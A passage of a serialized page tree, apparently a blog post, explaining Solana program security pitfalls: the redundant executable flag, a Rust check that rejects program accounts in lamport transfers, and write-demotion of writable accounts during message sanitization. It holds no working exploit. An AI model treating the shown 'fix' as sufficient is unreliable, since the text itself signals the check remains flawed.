authority.\n",{"type":26,"tag":137,"props":76463,"children":76464},{"class":5559,"line":5909},[76465,76470,76474,76478,76482,76486],{"type":26,"tag":137,"props":76466,"children":76467},{"style":5584},[76468],{"type":32,"value":76469},"    upgrade_authority_address",{"type":26,"tag":137,"props":76471,"children":76472},{"style":5590},[76473],{"type":32,"value":7072},{"type":26,"tag":137,"props":76475,"children":76476},{"style":6009},[76477],{"type":32,"value":30238},{"type":26,"tag":137,"props":76479,"children":76480},{"style":5601},[76481],{"type":32,"value":8391},{"type":26,"tag":137,"props":76483,"children":76484},{"style":6009},[76485],{"type":32,"value":23991},{"type":26,"tag":137,"props":76487,"children":76488},{"style":5601},[76489],{"type":32,"value":8723},{"type":26,"tag":137,"props":76491,"children":76492},{"class":5559,"line":5930},[76493],{"type":26,"tag":137,"props":76494,"children":76495},{"style":5564},[76496],{"type":32,"value":76497},"    // The raw program data follows this serialized structure in the\n",{"type":26,"tag":137,"props":76499,"children":76500},{"class":5559,"line":5939},[76501],{"type":26,"tag":137,"props":76502,"children":76503},{"style":5564},[76504],{"type":32,"value":76505},"    // account's data.\n",{"type":26,"tag":137,"props":76507,"children":76508},{"class":5559,"line":6191},[76509],{"type":26,"tag":137,"props":76510,"children":76511},{"style":5601},[76512],{"type":32,"value":76413},{"type":26,"tag":35,"props":76514,"children":76515},{},[76516,76518,76525],{"type":32,"value":76517},"Eventually, the executable flag will be removed entirely as proposed in ",{"type":26,"tag":41,"props":76519,"children":76522},{"href":76520,"rel":76521},"https://github.com/solana-foundation/solana-improvement-documents/blob/main/proposals/0162-remove-accounts-executable-flag-checks.md",[45],[76523],{"type":32,"value":76524},"SIMD-0162",{"type":32,"value":76526},". The reasoning is simple: an account's owner and its content are sufficient to determine if it's a valid program — the executable flag is redundant.",{"type":26,"tag":35,"props":76528,"children":76529},{},[76530,76532,76537,76539,76544],{"type":32,"value":76531},"This change is also a ",{"type":26,"tag":84,"props":76533,"children":76534},{},[76535],{"type":32,"value":76536},"hard requirement for supporting the new loader-v4",{"type":32,"value":76538},". Unlike the upgradable loader, which relies on a separate ",{"type":26,"tag":130,"props":76540,"children":76542},{"className":76541},[],[76543],{"type":32,"value":76421},{"type":32,"value":76545}," proxy account, loader-v4 stores all program data directly in the program account itself.",{"type":26,"tag":35,"props":76547,"children":76548},{},[76549,76551,76558,76560,76565],{"type":32,"value":76550},"As a result, it becomes impossible to modify the account's size after deployment, or to ",{"type":26,"tag":41,"props":76552,"children":76555},{"href":76553,"rel":76554},"https://github.com/anza-xyz/agave/blob/7a1e57469a5b1aeed617457c0519803620ba953f/programs/bpf_loader/src/lib.rs#L1411",[45],[76556],{"type":32,"value":76557},"migrate",{"type":32,"value":76559}," from the upgradable loader to loader-v4 — without hitting the ",{"type":26,"tag":130,"props":76561,"children":76563},{"className":76562},[],[76564],{"type":32,"value":75998},{"type":32,"value":76566}," restriction.",{"type":26,"tag":21485,"props":76568,"children":76570},{"id":76569},"fix-2-reject-program-accounts",[76571],{"type":32,"value":76572},"Fix 2: Reject Program Accounts",{"type":26,"tag":35,"props":76574,"children":76575},{},[76576],{"type":32,"value":76577},"To avoid this footgun, let’s explicitly skip any executable account:",{"type":26,"tag":5512,"props":76579,"children":76581},{"className":5552,"code":76580,"language":5551,"meta":7,"style":7},"pub fn can_transfer_lamports(account: &AccountInfo, lamports: u64) -> Result\u003Cbool> {\nfn is_program(account: &AccountInfo) -> bool {\n    account.executable\n}\nlet rent = Rent::get()?;\nlet balance_after = account.lamports() + lamports;\nOk(account.is_writable\n    && rent.is_exempt(balance_after, account.data_len())\n    && !is_program(account))\n}\n",[76582],{"type":26,"tag":130,"props":76583,"children":76584},{"__ignoreMap":7},[76585,76661,76709,76725,76732,76771,76815,76839,76888,76916],{"type":26,"tag":137,"props":76586,"children":76587},{"class":5559,"line":5560},[76588,76592,76596,76601,76605,76609,76613,76617,76621,76625,76629,76633,76637,76641,76645,76649,76653,76657],{"type":26,"tag":137,"props":76589,"children":76590},{"style":5573},[76591],{"type":32,"value":16281},{"type":26,"tag":137,"props":76593,"children":76594},{"style":5573},[76595],{"type":32,"value":16286},{"type":26,"tag":137,"props":76597,"children":76598},{"style":5682},[76599],{"type":32,"value":76600}," can_transfer_lamports",{"type":26,"tag":137,"props":76602,"children":76603},{"style":5601},[76604],{"type":32,"value":165},{"type":26,"tag":137,"props":76606,"children":76607},{"style":5584},[76608],{"type":32,"value":15544},{"type":26,"tag":137,"props":76610,"children":76611},{"style":5590},[76612],{"type":32,"value":7072},{"type":26,"tag":137,"props":76614,"children":76615},{"style":5590},[76616],{"type":32,"value":9725},{"type":26,"tag":137,"props":76618,"children":76619},{"style":6009},[76620],{"type":32,"value":17530},{"type":26,"tag":137,"props":76622,"children":76623},{"style":5601},[76624],{"type":32,"value":1108},{"type":26,"tag":137,"props":76626,"children":76627},{"style":5584},[76628],{"type":32,"value":18103},{"type":26,"tag":137,"props":76630,"children":76631},{"style":5590},[76632],{"type":32,"value":7072},{"type":26,"tag":137,"props":76634,"children":76635},{"style":6009},[76636],{"type":32,"value":8445},{"type":26,"tag":137,"props":76638,"children":76639},{"style":5601},[76640],{"type":32,"value":5671},{"type":26,"tag":137,"props":76642,"children":76643},{"style":5590},[76644],{"type":32,"value":16348},{"type":26,"tag":137,"props":76646,"children":76647},{"style":6009},[76648],{"type":32,"value":16353},{"type":26,"tag":137,"props":76650,"children":76651},{"style":5601},[76652],{"type":32,"value":8391},{"type":26,"tag":137,"props":76654,"children":76655},{"style":6009},[76656],{"type":32,"value":32279},{"type":26,"tag":137,"props":76658,"children":76659},{"style":5601},[76660],{"type":32,"value":9865},{"type":26,"tag":137,"props":76662,"children":76663},{"class":5559,"line":5412},[76664,76668,76673,76677,76681,76685,76689,76693,76697,76701,76705],{"type":26,"tag":137,"props":76665,"children":76666},{"style":5573},[76667],{"type":32,"value":22860},{"type":26,"tag":137,"props":76669,"children":76670},{"style":5682},[76671],{"type":32,"value":76672}," is_program",{"type":26,"tag":137,"props":76674,"children":76675},{"style":5601},[76676],{"type":32,"value":165},{"type":26,"tag":137,"props":76678,"children":76679},{"style":5584},[76680],{"type":32,"value":15544},{"type":26,"tag":137,"props":76682,"children":76683},{"style":5590},[76684],{"type":32,"value":7072},{"type":26,"tag":137,"props":76686,"children":76687},{"style":5590},[76688],{"type":32,"value":9725},{"type":26,"tag":137,"props":76690,"children":76691},{"style":6009},[76692],{"type":32,"value":17530},{"type":26,"tag":137,"props":76694,"children":76695},{"style":5601},[76696],{"type":32,"value":5671},{"type":26,"tag":137,"props":76698,"children":76699},{"style":5590},[76700],{"type":32,"value":16348},{"type":26,"tag":137,"props":76702,"children":76703},{"style":6009},[76704],{"type":32,"value":14641},{"type":26,"tag":137,"props":76706,"children":76707},{"style":5601},[76708],{"type":32,"value":5875},{"type":26,"tag":137,"props":76710,"children":76711},{"class":5559,"line":5417},[76712,76716,76720],{"type":26,"tag":137,"props":76713,"children":76714},{"style":5584},[76715],{"type":32,"value":27763},{"type":26,"tag":137,"props":76717,"children":76718},{"style":5590},[76719],{"type":32,"value":470},{"type":26,"tag":137,"props":76721,"children":76722},{"style":5601},[76723],{"type":32,"value":76724},"executable\n",{"type":26,"tag":137,"props":76726,"children":76727},{"class":5559,"line":5642},[76728],{"type":26,"tag":137,"props":76729,"children":76730},{"style":5601},[76731],{"type":32,"value":6507},{"type":26,"tag":137,"props":76733,"children":76734},{"class":5559,"line":5745},[76735,76739,76743,76747,76751,76755,76759,76763,76767],{"type":26,"tag":137,"props":76736,"children":76737},{"style":5573},[76738],{"type":32,"value":14378},{"type":26,"tag":137,"props":76740,"children":76741},{"style":5584},[76742],{"type":32,"value":75492},{"type":26,"tag":137,"props":76744,"children":76745},{"style":5590},[76746],{"type":32,"value":5593},{"type":26,"tag":137,"props":76748,"children":76749},{"style":6009},[76750],{"type":32,"value":46070},{"type":26,"tag":137,"props":76752,"children":76753},{"style":5590},[76754],{"type":32,"value":6072},{"type":26,"tag":137,"props":76756,"children":76757},{"style":5682},[76758],{"type":32,"value":18944},{"type":26,"tag":137,"props":76760,"children":76761},{"style":5601},[76762],{"type":32,"value":16470},{"type":26,"tag":137,"props":76764,"children":76765},{"style":5590},[76766],{"type":32,"value":5737},{"type":26,"tag":137,"props":76768,"children":76769},{"style":5601},[76770],{"type":32,"value":5604},{"type":26,"tag":137,"props":76772,"children":76773},{"class":5559,"line":5850},[76774,76778,76783,76787,76791,76795,76799,76803,76807,76811],{"type":26,"tag":137,"props":76775,"children":76776},{"style":5573},[76777],{"type":32,"value":14378},{"type":26,"tag":137,"props":76779,"children":76780},{"style":5584},[76781],{"type":32,"value":76782}," balance_after",{"type":26,"tag":137,"props":76784,"children":76785},{"style":5590},[76786],{"type":32,"value":5593},{"type":26,"tag":137,"props":76788,"children":76789},{"style":5584},[76790],{"type":32,"value":8066},{"type":26,"tag":137,"props":76792,"children":76793},{"style":5590},[76794],{"type":32,"value":470},{"type":26,"tag":137,"props":76796,"children":76797},{"style":5682},[76798],{"type":32,"value":18103},{"type":26,"tag":137,"props":76800,"children":76801},{"style":5601},[76802],{"type":32,"value":16634},{"type":26,"tag":137,"props":76804,"children":76805},{"style":5590},[76806],{"type":32,"value":356},{"type":26,"tag":137,"props":76808,"children":76809},{"style":5584},[76810],{"type":32,"value":75803},{"type":26,"tag":137,"props":76812,"children":76813},{"style":5601},[76814],{"type":32,"value":5604},{"type":26,"tag":137,"props":76816,"children":76817},{"class":5559,"line":5878},[76818,76822,76826,76830,76834],{"type":26,"tag":137,"props":76819,"children":76820},{"style":6009},[76821],{"type":32,"value":23083},{"type":26,"tag":137,"props":76823,"children":76824},{"style":5601},[76825],{"type":32,"value":165},{"type":26,"tag":137,"props":76827,"children":76828},{"style":5584},[76829],{"type":32,"value":15544},{"type":26,"tag":137,"props":76831,"children":76832},{"style":5590},[76833],{"type":32,"value":470},{"type":26,"tag":137,"props":76835,"children":76836},{"style":5601},[76837],{"type":32,"value":76838},"is_writable\n",{"type":26,"tag":137,"props":76840,"children":76841},{"class":5559,"line":5891},[76842,76846,76850,76854,76859,76863,76868,76872,76876,76880,76884],{"type":26,"tag":137,"props":76843,"children":76844},{"style":5590},[76845],{"type":32,"value":18213},{"type":26,"tag":137,"props":76847,"children":76848},{"style":5584},[76849],{"type":32,"value":75492},{"type":26,"tag":137,"props":76851,"children":76852},{"style":5590},[76853],{"type":32,"value":470},{"type":26,"tag":137,"props":76855,"children":76856},{"style":5682},[76857],{"type":32,"value":76858},"is_exempt",{"type":26,"tag":137,"props":76860,"children":76861},{"style":5601},[76862],{"type":32,"value":165},{"type":26,"tag":137,"props":76864,"children":76865},{"style":5584},[76866],{"type":32,"value":76867},"balance_after",{"type":26,"tag":137,"props":76869,"children":76870},{"style":5601},[76871],{"type":32,"value":1108},{"type":26,"tag":137,"props":76873,"children":76874},{"style":5584},[76875],{"type":32,"value":15544},{"type":26,"tag":137,"props":76877,"children":76878},{"style":5590},[76879],{"type":32,"value":470},{"type":26,"tag":137,"props":76881,"children":76882},{"style":5682},[76883],{"type":32,"value":16397},{"type":26,"tag":137,"props":76885,"children":76886},{"style":5601},[76887],{"type":32,"value":18252},{"type":26,"tag":137,"props":76889,"children":76890},{"class":5559,"line":5909},[76891,76895,76899,76904,76908,76912],{"type":26,"tag":137,"props":76892,"children":76893},{"style":5590},[76894],{"type":32,"value":18213},{"type":26,"tag":137,"props":76896,"children":76897},{"style":5590},[76898],{"type":32,"value":15455},{"type":26,"tag":137,"props":76900,"children":76901},{"style":5682},[76902],{"type":32,"value":76903},"is_program",{"type":26,"tag":137,"props":76905,"children":76906},{"style":5601},[76907],{"type":32,"value":165},{"type":26,"tag":137,"props":76909,"children":76910},{"style":5584},[76911],{"type":32,"value":15544},{"type":26,"tag":137,"props":76913,"children":76914},{"style":5601},[76915],{"type":32,"value":22305},{"type":26,"tag":137,"props":76917,"children":76918},{"class":5559,"line":5930},[76919],{"type":26,"tag":137,"props":76920,"children":76921},{"style":5601},[76922],{"type":32,"value":6507},{"type":26,"tag":35,"props":76924,"children":76925},{},[76926],{"type":32,"value":76927},"Now we’re safe...right?",{"type":26,"tag":118,"props":76929,"children":76931},{"id":76930},"bug-3-the-write-demotion-trap",[76932],{"type":32,"value":76933},"Bug 3: The Write-Demotion Trap",{"type":26,"tag":35,"props":76935,"children":76936},{},[76937,76939,76944,76946,76951],{"type":32,"value":76938},"On Solana, accounts passed as ",{"type":26,"tag":84,"props":76940,"children":76941},{},[76942],{"type":32,"value":76943},"writable",{"type":32,"value":76945}," in a transaction can be ",{"type":26,"tag":84,"props":76947,"children":76948},{},[76949],{"type":32,"value":76950},"silently downgraded to read-only",{"type":32,"value":76952},". This behavior occurs during message sanitization — even before your program runs.",{"type":26,"tag":35,"props":76954,"children":76955},{},[76956,76958,76965],{"type":32,"value":76957},"Let’s walk through the logic for legacy messages (note: the same rules apply to ",{"type":26,"tag":41,"props":76959,"children":76962},{"href":76960,"rel":76961},"https://github.com/anza-xyz/solana-sdk/blob/master/message/src/versions/v0/loaded.rs#L58-L98",[45],[76963],{"type":32,"value":76964},"MessageV0",{"type":32,"value":76966},", but legacy is simpler to follow):",{"type":26,"tag":5512,"props":76968,"children":76970},{"className":5552,"code":76969,"language":5551,"meta":7,"style":7},"// https://github.com/anza-xyz/solana-sdk/blob/master/message/src/sanitized.rs#L39-L55\nimpl LegacyMessage\u003C'_> {\n    pub fn new(message: legacy::Message, reserved_account_keys: &HashSet\u003CPubkey>) -> Self {\n        let is_writable_account_cache = message\n            .account_keys\n            .iter()\n            .enumerate()\n            .map(|(i, _key)| {\n                message.is_writable_index(i)\n                    && !reserved_account_keys.contains(&message.account_keys[i])\n                    && !message.demote_program_id(i)\n            })\n            .collect::\u003CVec\u003C_>>();\n        Self {\n            message: Cow::Owned(message),\n            is_writable_account_cache,\n        }\n    }\n}\n\n// https://github.com/anza-xyz/solana-sdk/blob/master/message/src/legacy.rs#L642-L644\npub fn demote_program_id(&self, i: usize) -> bool {\n    self.is_key_called_as_program(i) && !self.is_upgradeable_loader_present()\n}\n\n",[76971],{"type":26,"tag":130,"props":76972,"children":76973},{"__ignoreMap":7},[76974,76982,77006,77094,77115,77127,77143,77159,77207,77236,77290,77326,77334,77371,77383,77421,77433,77440,77447,77454,77461,77469,77529,77582],{"type":26,"tag":137,"props":76975,"children":76976},{"class":5559,"line":5560},[76977],{"type":26,"tag":137,"props":76978,"children":76979},{"style":5564},[76980],{"type":32,"value":76981},"// https://github.com/anza-xyz/solana-sdk/blob/master/message/src/sanitized.rs#L39-L55\n",{"type":26,"tag":137,"props":76983,"children":76984},{"class":5559,"line":5412},[76985,76989,76994,76998,77002],{"type":26,"tag":137,"props":76986,"children":76987},{"style":5573},[76988],{"type":32,"value":30787},{"type":26,"tag":137,"props":76990,"children":76991},{"style":6009},[76992],{"type":32,"value":76993}," LegacyMessage",{"type":26,"tag":137,"props":76995,"children":76996},{"style":5601},[76997],{"type":32,"value":25502},{"type":26,"tag":137,"props":76999,"children":77000},{"style":6009},[77001],{"type":32,"value":5666},{"type":26,"tag":137,"props":77003,"children":77004},{"style":5601},[77005],{"type":32,"value":9865},{"type":26,"tag":137,"props":77007,"children":77008},{"class":5559,"line":5417},[77009,77013,77017,77021,77025,77029,77033,77038,77042,77047,77051,77056,77060,77064,77069,77073,77077,77081,77085,77090],{"type":26,"tag":137,"props":77010,"children":77011},{"style":5573},[77012],{"type":32,"value":23436},{"type":26,"tag":137,"props":77014,"children":77015},{"style":5573},[77016],{"type":32,"value":16286},{"type":26,"tag":137,"props":77018,"children":77019},{"style":5682},[77020],{"type":32,"value":34528},{"type":26,"tag":137,"props":77022,"children":77023},{"style":5601},[77024],{"type":32,"value":165},{"type":26,"tag":137,"props":77026,"children":77027},{"style":5584},[77028],{"type":32,"value":70638},{"type":26,"tag":137,"props":77030,"children":77031},{"style":5590},[77032],{"type":32,"value":7072},{"type":26,"tag":137,"props":77034,"children":77035},{"style":5601},[77036],{"type":32,"value":77037}," legacy",{"type":26,"tag":137,"props":77039,"children":77040},{"style":5590},[77041],{"type":32,"value":6072},{"type":26,"tag":137,"props":77043,"children":77044},{"style":6009},[77045],{"type":32,"value":77046},"Message",{"type":26,"tag":137,"props":77048,"children":77049},{"style":5601},[77050],{"type":32,"value":1108},{"type":26,"tag":137,"props":77052,"children":77053},{"style":5584},[77054],{"type":32,"value":77055},"reserved_account_keys",{"type":26,"tag":137,"props":77057,"children":77058},{"style":5590},[77059],{"type":32,"value":7072},{"type":26,"tag":137,"props":77061,"children":77062},{"style":5590},[77063],{"type":32,"value":9725},{"type":26,"tag":137,"props":77065,"children":77066},{"style":6009},[77067],{"type":32,"value":77068},"HashSet",{"type":26,"tag":137,"props":77070,"children":77071},{"style":5601},[77072],{"type":32,"value":8391},{"type":26,"tag":137,"props":77074,"children":77075},{"style":6009},[77076],{"type":32,"value":23991},{"type":26,"tag":137,"props":77078,"children":77079},{"style":5601},[77080],{"type":32,"value":23040},{"type":26,"tag":137,"props":77082,"children":77083},{"style":5590},[77084],{"type":32,"value":16348},{"type":26,"tag":137,"props":77086,"children":77087},{"style":5573},[77088],{"type":32,"value":77089}," Self",{"type":26,"tag":137,"props":77091,"children":77092},{"style":5601},[77093],{"type":32,"value":5875},{"type":26,"tag":137,"props":77095,"children":77096},{"class":5559,"line":5642},[77097,77101,77106,77110],{"type":26,"tag":137,"props":77098,"children":77099},{"style":5573},[77100],{"type":32,"value":5648},{"type":26,"tag":137,"props":77102,"children":77103},{"style":5584},[77104],{"type":32,"value":77105}," is_writable_account_cache",{"type":26,"tag":137,"props":77107,"children":77108},{"style":5590},[77109],{"type":32,"value":5593},{"type":26,"tag":137,"props":77111,"children":77112},{"style":5584},[77113],{"type":32,"value":77114}," message\n",{"type":26,"tag":137,"props":77116,"children":77117},{"class":5559,"line":5745},[77118,77122],{"type":26,"tag":137,"props":77119,"children":77120},{"style":5590},[77121],{"type":32,"value":5751},{"type":26,"tag":137,"props":77123,"children":77124},{"style":5601},[77125],{"type":32,"value":77126},"account_keys\n",{"type":26,"tag":137,"props":77128,"children":77129},{"class":5559,"line":5850},[77130,77134,77139],{"type":26,"tag":137,"props":77131,"children":77132},{"style":5590},[77133],{"type":32,"value":5751},{"type":26,"tag":137,"props":77135,"children":77136},{"style":5682},[77137],{"type":32,"value":77138},"iter",{"type":26,"tag":137,"props":77140,"children":77141},{"style":5601},[77142],{"type":32,"value":10320},{"type":26,"tag":137,"props":77144,"children":77145},{"class":5559,"line":5878},[77146,77150,77155],{"type":26,"tag":137,"props":77147,"children":77148},{"style":5590},[77149],{"type":32,"value":5751},{"type":26,"tag":137,"props":77151,"children":77152},{"style":5682},[77153],{"type":32,"value":77154},"enumerate",{"type":26,"tag":137,"props":77156,"children":77157},{"style":5601},[77158],{"type":32,"value":10320},{"type":26,"tag":137,"props":77160,"children":77161},{"class":5559,"line":5891},[77162,77166,77170,77174,77178,77182,77186,77190,77195,77199,77203],{"type":26,"tag":137,"props":77163,"children":77164},{"style":5590},[77165],{"type":32,"value":5751},{"type":26,"tag":137,"props":77167,"children":77168},{"style":5682},[77169],{"type":32,"value":69703},{"type":26,"tag":137,"props":77171,"children":77172},{"style":5601},[77173],{"type":32,"value":165},{"type":26,"tag":137,"props":77175,"children":77176},{"style":5590},[77177],{"type":32,"value":13006},{"type":26,"tag":137,"props":77179,"children":77180},{"style":5601},[77181],{"type":32,"value":165},{"type":26,"tag":137,"props":77183,"children":77184},{"style":5584},[77185],{"type":32,"value":506},{"type":26,"tag":137,"props":77187,"children":77188},{"style":5601},[77189],{"type":32,"value":1108},{"type":26,"tag":137,"props":77191,"children":77192},{"style":5584},[77193],{"type":32,"value":77194},"_key",{"type":26,"tag":137,"props":77196,"children":77197},{"style":5601},[77198],{"type":32,"value":200},{"type":26,"tag":137,"props":77200,"children":77201},{"style":5590},[77202],{"type":32,"value":13006},{"type":26,"tag":137,"props":77204,"children":77205},{"style":5601},[77206],{"type":32,"value":5875},{"type":26,"tag":137,"props":77208,"children":77209},{"class":5559,"line":5909},[77210,77215,77219,77224,77228,77232],{"type":26,"tag":137,"props":77211,"children":77212},{"style":5584},[77213],{"type":32,"value":77214},"                message",{"type":26,"tag":137,"props":77216,"children":77217},{"style":5590},[77218],{"type":32,"value":470},{"type":26,"tag":137,"props":77220,"children":77221},{"style":5682},[77222],{"type":32,"value":77223},"is_writable_index",{"type":26,"tag":137,"props":77225,"children":77226},{"style":5601},[77227],{"type":32,"value":165},{"type":26,"tag":137,"props":77229,"children":77230},{"style":5584},[77231],{"type":32,"value":506},{"type":26,"tag":137,"props":77233,"children":77234},{"style":5601},[77235],{"type":32,"value":5742},{"type":26,"tag":137,"props":77237,"children":77238},{"class":5559,"line":5930},[77239,77244,77248,77252,77256,77261,77265,77269,77273,77277,77282,77286],{"type":26,"tag":137,"props":77240,"children":77241},{"style":5590},[77242],{"type":32,"value":77243},"                    &&",{"type":26,"tag":137,"props":77245,"children":77246},{"style":5590},[77247],{"type":32,"value":15455},{"type":26,"tag":137,"props":77249,"children":77250},{"style":5584},[77251],{"type":32,"value":77055},{"type":26,"tag":137,"props":77253,"children":77254},{"style":5590},[77255],{"type":32,"value":470},{"type":26,"tag":137,"props":77257,"children":77258},{"style":5682},[77259],{"type":32,"value":77260},"contains",{"type":26,"tag":137,"props":77262,"children":77263},{"style":5601},[77264],{"type":32,"value":165},{"type":26,"tag":137,"props":77266,"children":77267},{"style":5590},[77268],{"type":32,"value":5694},{"type":26,"tag":137,"props":77270,"children":77271},{"style":5584},[77272],{"type":32,"value":70638},{"type":26,"tag":137,"props":77274,"children":77275},{"style":5590},[77276],{"type":32,"value":470},{"type":26,"tag":137,"props":77278,"children":77279},{"style":5601},[77280],{"type":32,"value":77281},"account_keys[",{"type":26,"tag":137,"props":77283,"children":77284},{"style":5584},[77285],{"type":32,"value":506},{"type":26,"tag":137,"props":77287,"children":77288},{"style":5601},[77289],{"type":32,"value":58043},{"type":26,"tag":137,"props":77291,"children":77292},{"class":5559,"line":5939},[77293,77297,77301,77305,77309,77314,77318,77322],{"type":26,"tag":137,"props":77294,"children":77295},{"style":5590},[77296],{"type":32,"value":77243},{"type":26,"tag":137,"props":77298,"children":77299},{"style":5590},[77300],{"type":32,"value":15455},{"type":26,"tag":137,"props":77302,"children":77303},{"style":5584},[77304],{"type":32,"value":70638},{"type":26,"tag":137,"props":77306,"children":77307},{"style":5590},[77308],{"type":32,"value":470},{"type":26,"tag":137,"props":77310,"children":77311},{"style":5682},[77312],{"type":32,"value":77313},"demote_program_id",{"type":26,"tag":137,"props":77315,"children":77316},{"style":5601},[77317],{"type":32,"value":165},{"type":26,"tag":137,"props":77319,"children":77320},{"style":5584},[77321],{"type":32,"value":506},{"type":26,"tag":137,"props":77323,"children":77324},{"style":5601},[77325],{"type":32,"value":5742},{"type":26,"tag":137,"props":77327,"children":77328},{"class":5559,"line":6191},[77329],{"type":26,"tag":137,"props":77330,"children":77331},{"style":5601},[77332],{"type":32,"value":77333},"            })\n",{"type":26,"tag":137,"props":77335,"children":77336},{"class":5559,"line":6208},[77337,77341,77346,77350,77354,77358,77362,77366],{"type":26,"tag":137,"props":77338,"children":77339},{"style":5590},[77340],{"type":32,"value":5751},{"type":26,"tag":137,"props":77342,"children":77343},{"style":5682},[77344],{"type":32,"value":77345},"collect",{"type":26,"tag":137,"props":77347,"children":77348},{"style":5590},[77349],{"type":32,"value":6072},{"type":26,"tag":137,"props":77351,"children":77352},{"style":5601},[77353],{"type":32,"value":8391},{"type":26,"tag":137,"props":77355,"children":77356},{"style":6009},[77357],{"type":32,"value":19804},{"type":26,"tag":137,"props":77359,"children":77360},{"style":5601},[77361],{"type":32,"value":8391},{"type":26,"tag":137,"props":77363,"children":77364},{"style":5584},[77365],{"type":32,"value":5666},{"type":26,"tag":137,"props":77367,"children":77368},{"style":5601},[77369],{"type":32,"value":77370},">>();\n",{"type":26,"tag":137,"props":77372,"children":77373},{"class":5559,"line":6225},[77374,77379],{"type":26,"tag":137,"props":77375,"children":77376},{"style":5573},[77377],{"type":32,"value":77378},"        Self",{"type":26,"tag":137,"props":77380,"children":77381},{"style":5601},[77382],{"type":32,"value":5875},{"type":26,"tag":137,"props":77384,"children":77385},{"class":5559,"line":6238},[77386,77391,77395,77400,77404,77409,77413,77417],{"type":26,"tag":137,"props":77387,"children":77388},{"style":5584},[77389],{"type":32,"value":77390},"            message",{"type":26,"tag":137,"props":77392,"children":77393},{"style":5590},[77394],{"type":32,"value":7072},{"type":26,"tag":137,"props":77396,"children":77397},{"style":6009},[77398],{"type":32,"value":77399}," Cow",{"type":26,"tag":137,"props":77401,"children":77402},{"style":5590},[77403],{"type":32,"value":6072},{"type":26,"tag":137,"props":77405,"children":77406},{"style":5682},[77407],{"type":32,"value":77408},"Owned",{"type":26,"tag":137,"props":77410,"children":77411},{"style":5601},[77412],{"type":32,"value":165},{"type":26,"tag":137,"props":77414,"children":77415},{"style":5584},[77416],{"type":32,"value":70638},{"type":26,"tag":137,"props":77418,"children":77419},{"style":5601},[77420],{"type":32,"value":9320},{"type":26,"tag":137,"props":77422,"children":77423},{"class":5559,"line":6247},[77424,77429],{"type":26,"tag":137,"props":77425,"children":77426},{"style":5584},[77427],{"type":32,"value":77428},"            is_writable_account_cache",{"type":26,"tag":137,"props":77430,"children":77431},{"style":5601},[77432],{"type":32,"value":6099},{"type":26,"tag":137,"props":77434,"children":77435},{"class":5559,"line":6270},[77436],{"type":26,"tag":137,"props":77437,"children":77438},{"style":5601},[77439],{"type":32,"value":5936},{"type":26,"tag":137,"props":77441,"children":77442},{"class":5559,"line":6279},[77443],{"type":26,"tag":137,"props":77444,"children":77445},{"style":5601},[77446],{"type":32,"value":5945},{"type":26,"tag":137,"props":77448,"children":77449},{"class":5559,"line":6288},[77450],{"type":26,"tag":137,"props":77451,"children":77452},{"style":5601},[77453],{"type":32,"value":6507},{"type":26,"tag":137,"props":77455,"children":77456},{"class":5559,"line":6355},[77457],{"type":26,"tag":137,"props":77458,"children":77459},{"emptyLinePlaceholder":18},[77460],{"type":32,"value":6276},{"type":26,"tag":137,"props":77462,"children":77463},{"class":5559,"line":6363},[77464],{"type":26,"tag":137,"props":77465,"children":77466},{"style":5564},[77467],{"type":32,"value":77468},"// https://github.com/anza-xyz/solana-sdk/blob/master/message/src/legacy.rs#L642-L644\n",{"type":26,"tag":137,"props":77470,"children":77471},{"class":5559,"line":6393},[77472,77476,77480,77485,77489,77493,77497,77501,77505,77509,77513,77517,77521,77525],{"type":26,"tag":137,"props":77473,"children":77474},{"style":5573},[77475],{"type":32,"value":16281},{"type":26,"tag":137,"props":77477,"children":77478},{"style":5573},[77479],{"type":32,"value":16286},{"type":26,"tag":137,"props":77481,"children":77482},{"style":5682},[77483],{"type":32,"value":77484}," demote_program_id",{"type":26,"tag":137,"props":77486,"children":77487},{"style":5601},[77488],{"type":32,"value":165},{"type":26,"tag":137,"props":77490,"children":77491},{"style":5590},[77492],{"type":32,"value":5694},{"type":26,"tag":137,"props":77494,"children":77495},{"style":5573},[77496],{"type":32,"value":16304},{"type":26,"tag":137,"props":77498,"children":77499},{"style":5601},[77500],{"type":32,"value":1108},{"type":26,"tag":137,"props":77502,"children":77503},{"style":5584},[77504],{"type":32,"value":506},{"type":26,"tag":137,"props":77506,"children":77507},{"style":5590},[77508],{"type":32,"value":7072},{"type":26,"tag":137,"props":77510,"children":77511},{"style":6009},[77512],{"type":32,"value":16322},{"type":26,"tag":137,"props":77514,"children":77515},{"style":5601},[77516],{"type":32,"value":5671},{"type":26,"tag":137,"props":77518,"children":77519},{"style":5590},[77520],{"type":32,"value":16348},{"type":26,"tag":137,"props":77522,"children":77523},{"style":6009},[77524],{"type":32,"value":14641},{"type":26,"tag":137,"props":77526,"children":77527},{"style":5601},[77528],{"type":32,"value":5875},{"type":26,"tag":137,"props":77530,"children":77531},{"class":5559,"line":6401},[77532,77536,77540,77545,77549,77553,77557,77561,77565,77569,77573,77578],{"type":26,"tag":137,"props":77533,"children":77534},{"style":5573},[77535],{"type":32,"value":23379},{"type":26,"tag":137,"props":77537,"children":77538},{"style":5590},[77539],{"type":32,"value":470},{"type":26,"tag":137,"props":77541,"children":77542},{"style":5682},[77543],{"type":32,"value":77544},"is_key_called_as_program",{"type":26,"tag":137,"props":77546,"children":77547},{"style":5601},[77548],{"type":32,"value":165},{"type":26,"tag":137,"props":77550,"children":77551},{"style":5584},[77552],{"type":32,"value":506},{"type":26,"tag":137,"props":77554,"children":77555},{"style":5601},[77556],{"type":32,"value":5671},{"type":26,"tag":137,"props":77558,"children":77559},{"style":5590},[77560],{"type":32,"value":75798},{"type":26,"tag":137,"props":77562,"children":77563},{"style":5590},[77564],{"type":32,"value":15455},{"type":26,"tag":137,"props":77566,"children":77567},{"style":5573},[77568],{"type":32,"value":16304},{"type":26,"tag":137,"props":77570,"children":77571},{"style":5590},[77572],{"type":32,"value":470},{"type":26,"tag":137,"props":77574,"children":77575},{"style":5682},[77576],{"type":32,"value":77577},"is_upgradeable_loader_present",{"type":26,"tag":137,"props":77579,"children":77580},{"style":5601},[77581],{"type":32,"value":10320},{"type":26,"tag":137,"props":77583,"children":77584},{"class":5559,"line":6433},[77585],{"type":26,"tag":137,"props":77586,"children":77587},{"style":5601},[77588],{"type":32,"value":6507},{"type":26,"tag":35,"props":77590,"children":77591},{},[77592],{"type":32,"value":77593},"As you can see, there are two main causes of write-demotion:",{"type":26,"tag":4820,"props":77595,"children":77596},{},[77597,77609],{"type":26,"tag":3430,"props":77598,"children":77599},{},[77600,77602],{"type":32,"value":77601},"The account appears in the 